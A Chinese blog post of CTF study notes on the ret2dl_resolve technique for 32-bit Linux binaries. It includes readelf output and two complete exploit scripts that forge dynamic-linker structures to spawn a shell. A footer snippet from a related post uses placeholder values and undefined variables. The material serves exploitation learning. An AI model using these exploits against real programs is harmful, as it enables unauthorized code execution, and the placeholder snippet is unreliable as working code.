Ret2dl_resolve学习笔记

最新推荐文章于 2024-09-24 18:00:58 发布
原创 最新推荐文章于 2024-09-24 18:00:58 发布 · 972 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了ret2dl_resolve的原理,即通过调用_dl_runtime_resolve函数修改重定向表和符号表项,指向伪造的字符串'system',并将函数参数设为'/bin/sh'地址以getshell。还说明了其前提条件,如非Full RELRO、无PIE、可溢出等,最后给出了pwntools和roputils两种EXP示例。
部署运行你感兴趣的模型镜像

ret2dl_resolve的原理:

 

动态链接相关函数_dl_runtime_resolve(link_map_obj, reloc_index)

功能:在第一次调用某函数时运行,绑定其地址到对应的GOT表项

第一个参数link_map_obj恒为GOT[1]的地址

第二个参数reloc_index为被绑定函数在.rel.plt段中的相对偏移

原理:

  1. 调用_dl_runtime_resolve,修改reloc_index,令其指向伪造在栈中的重定向表表项
  2. - 伪造重定向表表项,修改第二项中的符号表索引,令其指向伪造在栈中的符号表表项
  3. --伪造符号表表项,修改第一项(字符串表偏移),令其指向伪造在栈中的字符串(’system’)
  4. 令该函数的参数为写入在栈中的’/bin/sh\x00’的地址,即可getshell

 

ret2dl_resolve的前提:

 

1.非Full RELRO      -z lazy/norelro

2.无PIE              -no-pie

3.能够溢出           -fno-stack-protector

 

编译选项:gcc -m32 -fno-stack-protector -no-pie -z lazy main.c -o main

 

$ checksec main

 

RELRO            STACK CANARY      NX             PIE           

Partial RELRO   No canary found   NX enabled    No PIE         

 

重定向表:

 

$ readelf -r main

 

Relocation section '.rel.dyn' at offset 0x30c contains 3 entries:

 Offset     Info    Type            Sym.Value  Sym. Name

08049ff4  00000306 R_386_GLOB_DAT    00000000   __gmon_start__

08049ff8  00000706 R_386_GLOB_DAT    00000000   stdin@GLIBC_2.0

08049ffc  00000806 R_386_GLOB_DAT    00000000   stdout@GLIBC_2.0

 

Relocation section '.rel.plt' at offset 0x324 contains 5 entries:

 Offset     Info    Type            Sym.Value  Sym. Name

0804a00c  00000107 R_386_JUMP_SLOT   00000000   setbuf@GLIBC_2.0

0804a010  00000207 R_386_JUMP_SLOT   00000000   read@GLIBC_2.0

0804a014  00000407 R_386_JUMP_SLOT   00000000   strlen@GLIBC_2.0

0804a018  00000507 R_386_JUMP_SLOT   00000000   __libc_start_main@GLIBC_2.0

0804a01c  00000607 R_386_JUMP_SLOT   00000000   write@GLIBC_2.0

 

符号表:

 

$ readelf --dyn-sym main

 

Symbol table '.dynsym' contains 10 entries:

   Num:    Value  Size Type    Bind   Vis      Ndx Name

     0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND

     1: 00000000     0 FUNC    GLOBAL DEFAULT  UND setbuf@GLIBC_2.0 (2)

     2: 00000000     0 FUNC    GLOBAL DEFAULT  UND read@GLIBC_2.0 (2)

     3: 00000000     0 NOTYPE  WEAK   DEFAULT  UND __gmon_start__

     4: 00000000     0 FUNC    GLOBAL DEFAULT  UND strlen@GLIBC_2.0 (2)

     5: 00000000     0 FUNC    GLOBAL DEFAULT  UND __libc_start_main@GLIBC_2.0 (2)

     6: 00000000     0 FUNC    GLOBAL DEFAULT  UND write@GLIBC_2.0 (2)

     7: 00000000     0 OBJECT  GLOBAL DEFAULT  UND stdin@GLIBC_2.0 (2)

     8: 00000000     0 OBJECT  GLOBAL DEFAULT  UND stdout@GLIBC_2.0 (2)

     9: 0804866c     4 OBJECT  GLOBAL DEFAULT   16 _IO_stdin_used

 

EXP(pwntools):

 

from pwn import *

elf = ELF('main')

r = process('./main')

rop = ROP('./main')

 

offset = 112

bss_addr = elf.bss()

 

r.recvuntil('Welcome to XDCTF2015~!\n')

 

## stack pivoting to bss segment

## new stack size is 0x800

stack_size = 0x800

base_stage = bss_addr + stack_size

### padding

rop.raw('a' * offset)

### read 100 byte to base_stage

rop.read(0, base_stage, 100)

### stack pivoting, set esp = base_stage

#migrate = gadgets1: pop ebp     #stack: base_stage

#                    ret         #       gadgets2

#          gadgets2: mov ebp esp #       null

#                    pop ebp     #

#                    ret         #

 

rop.migrate(base_stage)

r.sendline(rop.chain())

 

## write sh="/bin/sh"

rop = ROP('./main')

sh = "/bin/sh"

 

plt0 = elf.get_section_by_name('.plt').header.sh_addr

rel_plt = elf.get_section_by_name('.rel.plt').header.sh_addr

dynsym = elf.get_section_by_name('.dynsym').header.sh_addr

dynstr = elf.get_section_by_name('.dynstr').header.sh_addr

 

### making fake write symbol

fake_sym_addr = base_stage + 32

align = 0x10 - ((fake_sym_addr - dynsym) & 0xf

                )  # since the size of item(Elf32_Symbol) of dynsym is 0x10

fake_sym_addr = fake_sym_addr + align

index_dynsym = (

    fake_sym_addr - dynsym) / 0x10  # calculate the dynsym index of write

## plus 10 since the size of Elf32_Sym is 16.

st_name = fake_sym_addr + 0x10 - dynstr

fake_write_sym = flat([st_name, 0, 0, 0x12])

 

### making fake write relocation

 

## making base_stage+24 ---> fake reloc

index_offset = base_stage + 24 - rel_plt

write_got = elf.got['write']

r_info = (index_dynsym << 8) | 0x7

fake_write_reloc = flat([write_got, r_info])

 

rop.raw(plt0)

rop.raw(index_offset) #指向fake_write_reloc

## fake ret addr of write

rop.raw('bbbb')

rop.raw(base_stage + 82) #system的参数:’/bin/sh\x00’的地址

rop.raw('bbbb')

rop.raw('bbbb')

#r_info的索引指向fake_write_sym

rop.raw(fake_write_reloc)  # fake write reloc

rop.raw('a' * align)  # padding

#指向’system’

rop.raw(fake_write_sym)  # fake write symbol

rop.raw('system\x00'# there must be a \x00 to mark the end of string

rop.raw('a' * (80 - len(rop.chain())))

print rop.dump()

print len(rop.chain())

rop.raw(sh + '\x00')

rop.raw('a' * (100 - len(rop.chain())))

 

r.sendline(rop.chain())

r.interactive()

 

EXP(roputils):

 

from roputils import *

from pwn import process

from pwn import gdb

from pwn import context

r = process('./main')

context.log_level = 'debug'

r.recv()

 

rop = ROP('./main')

offset = 112

bss_base = rop.section('.bss')

buf = rop.fill(offset)

 

buf += rop.call('read', 0, bss_base, 100)

# used to call dl_Resolve()

buf += rop.dl_resolve_call(bss_base + 20, bss_base)

r.send(buf)

 

buf = rop.string('/bin/sh')

buf += rop.fill(20, buf)

# used to make faking data, such relocation, Symbol, Str

buf += rop.dl_resolve_data(bss_base + 20, 'system')

buf += rop.fill(100, buf)

r.send(buf)

r.interactive()

 

您可能感兴趣的与本文相关的镜像

Facefusion

Facefusion

AI应用

FaceFusion是全新一代AI换脸工具,无需安装,一键运行,可以完成去遮挡,高清化,卡通脸一键替换,并且Nvidia/AMD等显卡全平台支持

forestdwelling
关注
浅析ret2dl_reslove
2301_79327647的博客
08-04 1265
/Dynamic entry type(动态段标识号)union} d_un;//动态段起始地址//表示重定位所作用的虚拟地址或got表处的真实地址//这是一个复合值,包括了重定位类型和符号表下标其中我们需要记住r_info是一个复合值,其高32位表示该重定位项在动态链接符号表.dynsym中对应项的下标,低32位表示该重定位项的重定向类型。/* 符号名,符号在字符串表STRTAB中的偏移 *//* 符号类型及绑定属性 */
32位ret2dlresolve学习
weixin_46521144的博客
04-28 425
RET-2-DLRESOLVE学习笔记 个人觉得这个算是对链接器工作,ELF文件利用比较深入的一个方法了,也是比较难的一个方法。 从一开始说起:为什么会有这种攻击。 最简单的ret2libc的原理,其实和这个很类似:都是利用加载器工作时对函数的载入机制。但是有时ret2libc不能使用(什么时候?当程序没有泄露函数puts或者system时,这时直接使用elf.plt[‘system’]会显示没有该函数的错误。) 为了解决上面的问题:有人想出了更为神奇的方式:既然Libc使用的是“动态绑定机制”,那么在运行
ret2dlresolve,ret2srop
2302_79813730的博客
02-06 1200
那么如果我们可以控制相应的参数及其对应地址的内容是不是就可以控制解析的函数了呢?没有一个函数,也不是我们经常利用的read,write函数,这里只有一次发送机会,但我们要发送两次,第一次先将返回地址再改成vuln函数,第二次发送我们的rop链。主要是2,这个过程会rt_sigreturn函数进行还原,而且是根据栈中内容去还原,之后我们可以利用工具去伪造我们想要rop链。一般,我们也称其为软中断信号,或者软中断。首先,32位的 标志特别突出,只有read函数能栈溢出。的机制,我们可以构造一个假的。
ret2dl-resolve
fa1c4的blog
04-19 451
最早是2015年在一篇论文中提出的攻击技术. How the ELF Ruined Christmas 因为通常漏洞利用包含两个阶段 信息泄露, 得知内存布局 通过已知内存布局, 利用漏洞 但由于不是常常能够得知内存信息, 所以ret2dl-resolve是一种仅仅利用ELF文件格式和动态装载器弱点进行漏洞利用的方法. 符号解析图示 .rel.plt段由Elf_Rel结构体构成 Elf_Rel结构体 struct Elf32_Rel { Elf32_Addr r_offset; // Loca
ret2dl_resolve
GalaxySpaceX的博客
09-24 1055
ret2dl_resolve
ret2dl_resolve解析1
08-08
在深入探讨`ret2dl_resolve解析1`这个主题之前,我们先来理解一些基础的ELF(Executable and Linking Format)文件格式和动态链接的概念。ELF是Unix系统及其变种,如Linux,广泛使用的可执行文件、共享库和核心转储...
ret2dl-runtime-resolve详细分析(32位&64位)
seaaseesa的博客
02-24 3891
Ret2dl-runtime-resolve技术 在linux下,二进制引用的外部符号加载方式有三种,FULL_RELRO、PARTIAL_RELRO、NO_RELRO,在PARTIAL_RELRO和NO_RELRO的情况下,外部符号的地址延迟加载,并且,在NO_RELRO下,ELF的dynamic段可读写。 ELF有plt表和got表,程序调用外部函数函数时,call的是plt表项,而plt...
栈溢出之ret2dlresolve
zyxx_wjc的博客
05-07 1177
三月份在buuctf上举办的DASCTF上有一道“简单"的栈题——checkin,然而我这个菜鸡拿到题之后直接麻爪了——没有输出咋泄露libc啊(这个Jmp.Cliff他就是逊啦......)......后来学长告诉我,有个技巧叫ret2dlresolve,可以处理这种没有输出的情况,自知基础不牢的我老老实实回到CTF wiki上找到了这个技巧,又参考了网上很多大佬的博客,啃了几天,总算是啃明白了。这两天国赛临近,正积极备赛,突然想到这个有些生疏的知识还未整理,就写个博客记录一下吧。 本文主要围绕64位下
BUUCTF-PWN gyctf_2020_bfnote(劫持TLS结构,ret2_dl_runtime_resolve
weixin_44145820的博客
04-19 1787
目录程序分析背景知识延迟绑定Canary漏洞利用Exp 程序分析 一道带有canary的栈溢出题目 main函数是吧ebp-4中存放地址再减四获得的 调试结果如下 背景知识 延迟绑定 本题需要利用ret2al_runtime_resolve,涉及到延迟绑定的技术,简单介绍一下函数绑定的过程,以atol的调用为例 我们看一下第一次调用程序atol,此时atol_got存放着atol@plt+6...
一种比较麻烦的Rop链构造——ret2dlresolve
dydxdz的博客
04-09 4037
ret2resolve 题目:0ctf 2018 babystack 上周末做了TCTF(0ctf 2018)的新人赛,题目难度适中,但垃圾如我一如既往没有做出几道题。在7o8v大佬的帮助下,弄懂了babystack的考察点和ret2resolve的利用原理,因此对照着wp记录一波。 0x01 ret2dlresolve原理 当一个程序第一次调用libc中的函数时,必须首先对libc中...
ret2dlresolve归纳
am_03的博客
09-02 415
ret2dl_resolve的原理: 动态链接相关函数_dl_runtime_resolve(link_map_obj, reloc_index) 功能:在第一次调用某函数时运行,绑定其地址到对应的GOT表项 第一个参数link_map_obj一直为GOT[1]的地址 第二个参数reloc_index为被绑定函数在.rel.plt段里的相对偏移 原理: 1.调用_dl_runtime_resolve,修改reloc_index,令其指向伪造在栈里的重定向表表项 2.- 伪造重定向表表项,修改第二项里符号表索
ret2dl_resolve 知识点总结
qq_43189757的博客
07-11 534
ret2dl-resole 是通过伪造到 .rel.plt , .dynsym, .dynstr中表项中的偏移以及伪造这三个段中的数据结构来达到调用system 函数的目的 这三个段的信息都可以在IDA中 DYNAMIC 段中找到 DT_STRTAB -> .dynstr DT_SYMTAB -> .dynsym DT_JMPREL -> .rel.plt...
【pwn学习】- ret2dlresolve
Morphy_Amo的博客
04-12 3841
ret2dlreslove
ret2dlresolve超详细教程(x86&x64)
qq_51868336的博客
03-10 7341
X86 前置知识 在Linux中,程序使用_dl_runtime_resolve(link_map,reloc_offset)来对动态链接的函数进行重定位。 而ret2dlresolve攻击的核心就是控制相应的参数及其对应地址的内容,从而控制解析的函数。 延迟绑定 第一次调用一个函数时,先是到plt表,然后jmp到got表 此时got表存的地址是在plt表上 其实也就是jmp got的下一条指令,这里先是push一个数字(该函数在rel.plt上的偏移,reloc_arg,后文会讲到),然后jmp到pl
ret2dlresolve以及srop
2301_81031055的博客
02-22 688
linux在加载ELF可执行文件的时候,包含的动态链接文件里的符号,并不会直接把这些符号的实际地址加载到内存中,而是会使用PLT + GOT 表来实现延迟绑定,简单说就是在第一次用到动态链接文件里的符号的时候才会去寻找符号的实际位置然后保存下来,下次使用的时候就可以直接访问了。所以我们就会想到用srop去解题,首先需要伪造栈帧信息,通过执行sigreturn(也就是syscall系统调用),还原出我们伪造的栈帧信息,来达到控制寄存器的目的 ,上面的网站有详细的讲解呦!这里我们可以直接通过脚本去获取权限。
ret2_dl_resolve原理和案例分析
蚁景网安学院
02-27 753
从一个简单程序说起在只有一个二进制程序 dl_resolve 的情况下, 先侦查一下程序file 看一下dl_resolveELF 32-bit LSB executable, Inte...
ret2dlresolve利用方法
九层台
05-10 2517
使用场景: 一遍运行(延迟绑定技术,只有在第一次调用该函数时才会调用_dll_runtime_resolve函数) 没有输出,没有system函数。 需要: 1.向一个固定地址写入数据(bss段) 2.能够劫持程序执行流 linux下c函数是放在libc库里面的 ldd pwn01 linux-gate.so.1 => (0xf7ef2000) libc.s...
从o开始的pwn学习之超详细ret2dl_resolve
jzc020121的博客
05-01 3333
文章目录从o开始的pwn学习之超详细ret2dl_resolve前置知识需要用到的节_dll_runtime_resolve函数延迟绑定机制_dl_fixup()函数RELROFull RELRONO RELROPartial RELRO_dll_runtime_resolve干了什么实践调用库函数实例插一个有意思的小点,关于低地址gdb无法断点调试这件事call指令的诞生与消亡栈迁移ret2dl_resolvelevel1EXP1level2目标计算 relloc_argEXP2level3思路EXP3l
Ret2dlresolve、Srop
weixin_66751120的博客
03-08 1732
介绍了ret2dlresolve和srop利用工具构造脚本进行解题的方法
CTFhub 技能树ret2dl_resolve
最新发布
07-02
在CTF比赛中,`ret2dl_resolve`是一种利用动态链接器(如`ld-linux.so`)的延迟绑定机制实现的漏洞利用技术。其核心思想是通过构造特定的数据结构(如`.rel.plt`、`symtab`和`strtab`),并劫持程序控制流至`dl_runtime_resolve`函数,从而触发对任意函数的解析与调用。 ### 基本原理 - **PLT/GOT机制**:程序中对外部函数的调用通常通过PLT(Procedure Linkage Table)进行跳转,而实际地址则存储在GOT(Global Offset Table)中。首次调用时,会进入动态链接器执行符号解析。 - **延迟绑定**:为提升性能,外部函数的地址并非在程序启动时全部解析,而是按需解析。具体来说,当第一次调用某个外部函数时,程序会跳转到PLT表项,然后进入GOT中的解析器入口(通常是`_dl_runtime_resolve`)来完成符号解析[^1]。 - **伪造重定位信息**:攻击者可以构造自定义的`.rel.plt`条目、符号表(`symtab`)和字符串表(`strtab`),并通过栈溢出等漏洞覆盖返回地址,使程序跳转至`_dl_runtime_resolve`函数,并传入伪造的重定位索引(`reloc_arg`)。这样,系统会根据攻击者提供的数据解析指定的函数名并调用它。 ### 实践步骤 #### 1. 确定目标函数 首先,需要确定希望调用的函数名称(如`system`或`execve`),并将其作为字符串存入内存中。 #### 2. 构造`.rel.plt`条目 每个`.rel.plt`条目包含一个偏移量(指向对应的符号表项)和一个类型字段(通常是`R_386_JMP_SLOT`或`R_X86_64_JMP_SLOT`)。攻击者需要将这个条目放置在可控的内存区域中。 #### 3. 构造符号表(`symtab`) 符号表中的每一项对应一个符号,其中包含符号名称在字符串表中的偏移、符号类型、绑定信息以及所属段等。攻击者需要确保该表中存在一个指向所需函数名的条目。 #### 4. 构造字符串表(`strtab`) 字符串表用于存储所有符号名称,攻击者需要在此处插入想要解析的函数名(如`"system"`)。 #### 5. 控制程序流 利用栈溢出或其他漏洞,将返回地址覆盖为`_dl_runtime_resolve`的地址,并传递伪造的`reloc_arg`参数(即`.rel.plt`条目的索引)。此时,程序会进入动态链接器并尝试解析攻击者指定的函数。 #### 6. 调用目标函数 一旦解析成功,动态链接器会更新GOT表项为真实函数地址,并跳转至该函数执行。攻击者可以在调用时传入参数(如`"/bin/sh"`),以达到获取shell的目的。 ### 示例代码(Python + pwntools) 以下是一个简单的示例,展示如何使用`pwntools`库构造`ret2dl_resolve`攻击: ```python from pwn import * import struct # 设置目标进程 p = process('./vuln') elf = ELF('./vuln') libc = elf.libc # 获取_dl_runtime_resolve地址 dl_runtime_resolve = libc.symbols['_dl_runtime_resolve'] log.info(f'_dl_runtime_resolve: {hex(dl_runtime_resolve)}') # 获取got表地址 plt0 = elf.get_section_by_name('.plt')['sh_addr'] log.info(f'plt0: {hex(plt0)}') # 构造fake rel.plt条目 fake_rel_plt = b'' fake_rel_plt += p64(elf.got['read']) # 指向got表中的某个位置 fake_rel_plt += p32(0x7) # R_X86_64_JMP_SLOT fake_rel_plt += p32(0x0) fake_rel_plt += p64(0x0) # 构造fake symtab条目 symtab_entry = b'' symtab_entry += p32(0x10) # 符号名称在strtab中的偏移 symtab_entry += p32(0x12) # ST_INFO (FUNC GLOBAL) symtab_entry += p64(0x0) # st_value (函数地址) symtab_entry += p64(0x0) # st_size symtab_entry += b'\x00' * 0x10 # 其他字段 # 构造strtab strtab = b'/bin/sh\x00system\x00' # 计算reloc_arg reloc_arg = 0xdeadbeef # 需要根据实际情况计算 # 构造payload payload = b'A' * offset_to_return_address payload += p64(dl_runtime_resolve) payload += p64(reloc_arg) payload += p64(fake_rel_plt_address) payload += p64(fake_symtab_address) payload += p64(fake_strtab_address) # 发送payload p.sendline(payload) p.interactive() ``` > 注意:上述代码仅为示例,实际攻击中需要根据具体的二进制文件结构调整各个地址和偏移量。 ### 调试技巧 - 使用`gdb`附加进程,观察PLT/GOT的跳转流程。 - 在`_dl_runtime_resolve`函数入口下断点,查看寄存器状态是否正确。 - 利用`one_gadget`等工具辅助寻找合适的gadget。 ### 相关挑战与练习平台 - **CTFhub技能树 - ret2dl_resolve**:提供了多个难度递增的题目,帮助学习如何构造`.rel.plt`、`symtab`和`strtab`。 - **Pwnable.kr**:部分题目涉及延迟绑定利用技术。 - **Hack The Box**:一些高级靶机也包含此类漏洞利用场景。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值